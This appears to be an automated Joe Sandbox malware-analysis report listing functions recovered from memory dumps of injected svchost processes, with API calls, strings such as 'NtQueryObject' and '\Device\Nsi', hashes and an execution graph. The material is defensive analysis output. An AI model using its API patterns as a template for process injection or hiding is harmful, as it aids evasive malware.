                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: 63f9d0c9a3f435df30d9287ce1e88f8f12ac40a567f3bc051c41d6af0309b307
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: 26110B36608B80C6EB60CF16F48479AB7A6F7C9B90F644126EE8D43B59DF38D4608B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: 2a6e0963ccc2ed3bad51216862b3e6897b89d2c3bd5c86574483065d4801315d
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: DC110A32218B8082EF658F15E58475D77EAF788B98F284221DE9D0BB68DF39D565CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: dea0be2e1a70f7a07727da35f09e077ea2fd57939fe8e74493f35045073ad64a
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: 0BF08221710B80D2FF059F41F4C8B9D736BBB88B90F685026E95907B54CE7AE9B5C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: 570273e120a3e8c577c3bdb4311871eba2d64fdb46f9ca993bdd388cde319497
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: 08E09221200545D6FA059FD1F4C9BEDE369AB88B44F799021965906356CE3ACAA6D300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: c36fe2a717e5506eddc23664b6460de5bb00a583dffaa4f374ff06a6f5680e55
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: 4BE09261200640D1FF055F50F8CDFAC236BBB88B80F784022D90907355CE3AE875C701
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: b0672fb7c12698f440fe56918fe6ef7d13faa2e811c5ad57e20f256fb271a35c
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: F0218326604B90C2FF128F69E44875EF3E6FB88B94F254120DE8C47B24EF7AD5628700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: b30e161d627de4a06bec79716b909aaf00c7dc6a08c636e7cef09a7898141e37
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: 62E03972611600C6FF048F72D849B4D36E6EB88B01F588024C90907350DF7E94A9C740

                                                                                Execution Graph

                                                                                Execution Coverage:0.6%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:71
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 21059 2917c3bb860 21062 2917c3bb871 _set_errno_from_matherr 21059->21062 21061 2917c3bb8c0 21062->21061 21063 2917c3bb840 TlsGetValue _set_errno_from_matherr 21062->21063 21063->21061 21064 2917c3b1c28 21070 2917c3b1650 GetProcessHeap 21064->21070 21066 2917c3b1c3e Sleep SleepEx 21068 2917c3b1c37 21066->21068 21068->21066 21069 2917c3b15c0 StrCmpIW StrCmpW 21068->21069 21122 2917c3b18dc 9 API calls 21068->21122 21069->21068 21071 2917c3b1670 _set_errno_from_matherr 21070->21071 21123 2917c3b1274 GetProcessHeap 21071->21123 21073 2917c3b1678 21127 2917c3b1000 GetProcessHeap 21073->21127 21075 2917c3b1680 21076 2917c3b1274 2 API calls 21075->21076 21077 2917c3b1689 21076->21077 21078 2917c3b1274 2 API calls 21077->21078 21079 2917c3b1692 21078->21079 21080 2917c3b1274 2 API calls 21079->21080 21081 2917c3b169b 21080->21081 21082 2917c3b1000 2 API calls 21081->21082 21083 2917c3b16a4 21082->21083 21084 2917c3b1000 2 API calls 21083->21084 21085 2917c3b16ad 21084->21085 21086 2917c3b1000 2 API calls 21085->21086 21087 2917c3b16b6 RegOpenKeyExW 21086->21087 21088 2917c3b18ce 21087->21088 21089 2917c3b16e8 RegOpenKeyExW 21087->21089 21088->21068 21090 2917c3b1711 21089->21090 21091 2917c3b1727 RegOpenKeyExW 21089->21091 21131 2917c3b12c8 11 API calls 2 library calls 21090->21131 21092 2917c3b174b 21091->21092 21093 2917c3b1762 RegOpenKeyExW 21091->21093 21132 2917c3b104c 4 API calls 2 library calls 21092->21132 21096 2917c3b179d RegOpenKeyExW 21093->21096 21097 2917c3b1786 21093->21097 21101 2917c3b17c1 21096->21101 21102 2917c3b17d8 RegOpenKeyExW 21096->21102 21133 2917c3b12c8 11 API calls 2 library calls 21097->21133 21098 2917c3b171d RegCloseKey 21098->21091 21099 2917c3b1758 RegCloseKey 21099->21093 21134 2917c3b12c8 11 API calls 2 library calls 21101->21134 21105 2917c3b17fc 21102->21105 21106 2917c3b1813 RegOpenKeyExW 21102->21106 21103 2917c3b1793 RegCloseKey 21103->21096 21135 2917c3b12c8 11 API calls 2 library calls 21105->21135 21107 2917c3b184e RegOpenKeyExW 21106->21107 21108 2917c3b1837 21106->21108 21112 2917c3b1889 RegOpenKeyExW 21107->21112 21113 2917c3b1872 21107->21113 21136 2917c3b104c 4 API calls 2 library calls 21108->21136 21109 2917c3b17ce RegCloseKey 21109->21102 21117 2917c3b18ad 21112->21117 21118 2917c3b18c4 RegCloseKey 21112->21118 21137 2917c3b104c 4 API calls 2 library calls 21113->21137 21114 2917c3b1809 RegCloseKey 21114->21106 21115 2917c3b1844 RegCloseKey 21115->21107 21138 2917c3b104c 4 API calls 2 library calls 21117->21138 21118->21088 21119 2917c3b187f RegCloseKey 21119->21112 21121 2917c3b18ba RegCloseKey 21121->21118 21139 2917c3c3170 21123->21139 21126 2917c3b12ba _set_errno_from_matherr 21126->21073 21128 2917c3c3170 _set_errno_from_matherr 21127->21128 21129 2917c3b101b GetProcessHeap 21128->21129 21130 2917c3b103d _set_errno_from_matherr 21129->21130 21130->21075 21131->21098 21132->21099 21133->21103 21134->21109 21135->21114 21136->21115 21137->21119 21138->21121 21140 2917c3b128f GetProcessHeap 21139->21140 21140->21126 21141 2917c382908 21142 2917c382936 21141->21142 21143 2917c382a2b LoadLibraryA 21142->21143 21144 2917c382aa7 21142->21144 21143->21142

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
                                                                                • Instruction ID: d82bf80160f3ad893f5203789eb3f9aaafa4c5397af4e4370bcb23b2e412be62
                                                                                • Opcode Fuzzy Hash: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
                                                                                • Instruction Fuzzy Hash: BFF0FFA261A7C18BE3169BA388152DD7FB0F789F01F89C156C64543392DB2C8499D761

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
                                                                                • Instruction ID: 5ebbc0a9cb69abeada060dae818d8b79bb16ba6e8652a291800e6584ebea83c1
                                                                                • Opcode Fuzzy Hash: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
                                                                                • Instruction Fuzzy Hash: 40E0EDB17616028AF758ABA7D8092DDB6B1FB88B11F488024C90907350DF3C84A5C660

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: 55d1877c20bbdf6a5ab53f9aa037a4b17a14155a04b4f2c9b9b1824979cac760
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: A8115B7171062382FBB5AFE3F84F3E9E290A754304F4441259A0A85BD4EF7DC0648670

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000002917C3B1650: GetProcessHeap.KERNEL32 ref: 000002917C3B165B
                                                                                  • Part of subcall function 000002917C3B1650: HeapAlloc.KERNEL32 ref: 000002917C3B166A
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B16DA
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1707
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1721
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1741
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B175C
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B177C
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1797
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B17B7
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B17D2
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B17F2
                                                                                • Sleep.KERNEL32 ref: 000002917C3B1C43
                                                                                • SleepEx.KERNELBASE ref: 000002917C3B1C49
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B180D
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B182D
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1848
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1868
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1883
                                                                                  • Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B18A3
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B18BE
                                                                                  • Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B18C8
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: d2daf431f9721c5445636364f6a2fb3d992cb93bad0da0b14cd0ac50400a6c82
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: 2B31A066300A0791FF50AFA7D66F3EEB2A6AB44BD0F145425DE09877D5DF24C4708270

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 67 2917c3b3930-2917c3b393b 68 2917c3b393d-2917c3b3950 StrCmpNIW 67->68 69 2917c3b3955-2917c3b395c 67->69 68->69 70 2917c3b3952 68->70 70->69
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction ID: c4f045ce32626fce012b2dd8539fcd99e1a90f8776fc0020d436b65ce71f6606
                                                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction Fuzzy Hash: 01D05E7031121B86FFA49FE3C88A3E8A350AB14704F4480208A0102754DB1C89AD8A20

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 71 2917c382908-2917c382973 call 2917c380f34 * 4 80 2917c382979-2917c38297c 71->80 81 2917c382b8b 71->81 80->81 83 2917c382982-2917c382985 80->83 82 2917c382b8d-2917c382ba9 81->82 83->81 84 2917c38298b-2917c38298e 83->84 84->81 85 2917c382994-2917c3829b2 84->85 85->81 87 2917c3829b8-2917c3829dc call 2917c380d6c 85->87 90 2917c382a0b-2917c382a12 87->90 91 2917c3829de-2917c382a09 call 2917c380d6c 87->91 93 2917c382ab2-2917c382ab9 90->93 94 2917c382a18-2917c382a25 90->94 91->90 95 2917c382b6c-2917c382b89 93->95 96 2917c382abf-2917c382ad6 93->96 94->93 98 2917c382a2b-2917c382a39 LoadLibraryA 94->98 95->82 96->95 99 2917c382adc 96->99 100 2917c382a3b-2917c382a45 98->100 101 2917c382a9d-2917c382aa5 98->101 104 2917c382ae2-2917c382af7 99->104 105 2917c382a48-2917c382a4c 100->105 101->98 102 2917c382aa7-2917c382aac 101->102 102->93 106 2917c382af9-2917c382b0a 104->106 107 2917c382b5b-2917c382b66 104->107 108 2917c382a9a 105->108 109 2917c382a4e-2917c382a52 105->109 111 2917c382b0c-2917c382b13 106->111 112 2917c382b15-2917c382b19 106->112 107->95 107->104 108->101 113 2917c382a7d-2917c382a87 109->113 114 2917c382a54-2917c382a7b 109->114 115 2917c382b48-2917c382b59 111->115 116 2917c382b1b-2917c382b22 112->116 117 2917c382b24-2917c382b28 112->117 118 2917c382a8d-2917c382a98 113->118 114->118 115->106 115->107 116->115 119 2917c382b3a-2917c382b3e 117->119 120 2917c382b2a-2917c382b38 117->120 118->105 119->115 121 2917c382b40-2917c382b43 119->121 120->115 121->115
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684148059.000002917C380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C380000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c380000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: 3d314fe80a3a6cadf4f42031064e5a7f911bb51db1a48455d98cfe6fe171df36
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: E361216274225387FA68CFA6D449BAEF3D1FB44B94F448021DE1907785DB39E862C730

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                • Instruction ID: 44e2fb32a20c8c2bbf20a73fea9e1c1299ef29b24eb7ff1bd85e960af2578a7e
                                                                                • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                • Instruction Fuzzy Hash: 0EF01D9470168785FE556FE7D85B3D592D06F84B48F5C54348D4ACA3D1DF1CC4654238

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                • Instruction ID: ee34f54790fca98c050d784f4ee02de5dbaa68851153e159f7c50544abe8f5f7
                                                                                • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                • Instruction Fuzzy Hash: 8DF0309570360785FED5ABE3955D3F5D2806FA7B40F5C44B08D0A863D1EF2CC5654210

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 366 2917c3b2cdc-2917c3b2d55 call 2917c3cecc0 369 2917c3b2d5b-2917c3b2d61 366->369 370 2917c3b3090-2917c3b30b3 366->370 369->370 371 2917c3b2d67-2917c3b2d6a 369->371 371->370 372 2917c3b2d70-2917c3b2d73 371->372 372->370 373 2917c3b2d79-2917c3b2d89 GetModuleHandleA 372->373 374 2917c3b2d8b-2917c3b2d9b call 2917c3c3090 373->374 375 2917c3b2d9d 373->375 377 2917c3b2da0-2917c3b2dbe 374->377 375->377 377->370 380 2917c3b2dc4-2917c3b2de3 StrCmpNIW 377->380 380->370 381 2917c3b2de9-2917c3b2ded 380->381 381->370 382 2917c3b2df3-2917c3b2dfd 381->382 382->370 383 2917c3b2e03-2917c3b2e0a 382->383 383->370 384 2917c3b2e10-2917c3b2e23 383->384 385 2917c3b2e33 384->385 386 2917c3b2e25-2917c3b2e31 384->386 387 2917c3b2e36-2917c3b2e3a 385->387 386->387 388 2917c3b2e3c-2917c3b2e48 387->388 389 2917c3b2e4a 387->389 390 2917c3b2e4d-2917c3b2e57 388->390 389->390 391 2917c3b2f4d-2917c3b2f51 390->391 392 2917c3b2e5d-2917c3b2e60 390->392 393 2917c3b3082-2917c3b308a 391->393 394 2917c3b2f57-2917c3b2f5a 391->394 395 2917c3b2e72-2917c3b2e7c 392->395 396 2917c3b2e62-2917c3b2e6f call 2917c3b1a14 392->396 393->370 393->384 397 2917c3b2f5c-2917c3b2f68 call 2917c3b1a14 394->397 398 2917c3b2f6b-2917c3b2f75 394->398 400 2917c3b2eb0-2917c3b2eba 395->400 401 2917c3b2e7e-2917c3b2e8b 395->401 396->395 397->398 405 2917c3b2f77-2917c3b2f84 398->405 406 2917c3b2fa5-2917c3b2fa8 398->406 402 2917c3b2ebc-2917c3b2ec9 400->402 403 2917c3b2eea-2917c3b2eed 400->403 401->400 408 2917c3b2e8d-2917c3b2e9a 401->408 402->403 409 2917c3b2ecb-2917c3b2ed8 402->409 410 2917c3b2efb-2917c3b2f08 lstrlenW 403->410 411 2917c3b2eef-2917c3b2ef9 call 2917c3b1d28 403->411 405->406 413 2917c3b2f86-2917c3b2f93 405->413 414 2917c3b2faa-2917c3b2fb3 call 2917c3b1d28 406->414 415 2917c3b2fb5-2917c3b2fc2 lstrlenW 406->415 416 2917c3b2e9d-2917c3b2ea3 408->416 421 2917c3b2edb-2917c3b2ee1 409->421 423 2917c3b2f2b-2917c3b2f3d call 2917c3b3930 410->423 424 2917c3b2f0a-2917c3b2f14 410->424 411->410 418 2917c3b2f43-2917c3b2f48 411->418 425 2917c3b2f96-2917c3b2f9c 413->425 414->415 435 2917c3b2ffa-2917c3b3005 414->435 419 2917c3b2fc4-2917c3b2fce 415->419 420 2917c3b2fe5-2917c3b2fef call 2917c3b3930 415->420 417 2917c3b2ea9-2917c3b2eae 416->417 416->418 417->400 417->416 429 2917c3b2ff2-2917c3b2ff4 418->429 419->420 430 2917c3b2fd0-2917c3b2fe3 call 2917c3b1554 419->430 420->429 421->418 431 2917c3b2ee3-2917c3b2ee8 421->431 423->418 423->429 424->423 434 2917c3b2f16-2917c3b2f29 call 2917c3b1554 424->434 425->435 436 2917c3b2f9e-2917c3b2fa3 425->436 429->393 429->435 430->420 430->435 431->403 431->421 434->418 434->423 440 2917c3b307c-2917c3b3080 435->440 441 2917c3b3007-2917c3b300b 435->441 436->406 436->425 440->393 444 2917c3b300d-2917c3b3011 441->444 445 2917c3b3013-2917c3b302d call 2917c3b86a0 441->445 444->445 447 2917c3b3030-2917c3b3033 444->447 445->447 449 2917c3b3056-2917c3b3059 447->449 450 2917c3b3035-2917c3b3053 call 2917c3b86a0 447->450 449->440 453 2917c3b305b-2917c3b3079 call 2917c3b86a0 449->453 450->449 453->440
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: de18c3f2bb1e9422b73b247cfda7fe031dcc69be369119bdbcb6686f6340cbbf
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: 6DB18072310A9381FBA49FA7D44ABE9E3A4FB44B84F545116EE0A53B94DF39C960C360
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: 04819cb48099a86f5594a0ab167e791b515f4fc142ffadadc1ae4574c5f1d6e1
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: 80B18B22222A93C2FBE88FA7C4587FAE3A4FB46B84F545016EE4953794DF35C960C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: 4e2982e1a579e03856fba74e8153e019d875c04b5551a6ee79dca9dff56c1bc8
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: 24317E72305B828AFB708FA6E8453EDB360F785744F44442ADA4E47B98EF38C658C720
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: a5a3e91584732625ba74e7a49344bbe54e004b8fd5ee4ef132d93c1c18debba2
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: 8D316272205B82D6FBA09FA2E8547EEB3A4F785744F44442ADB4D47B98EF38C558C710
                                                                                APIs
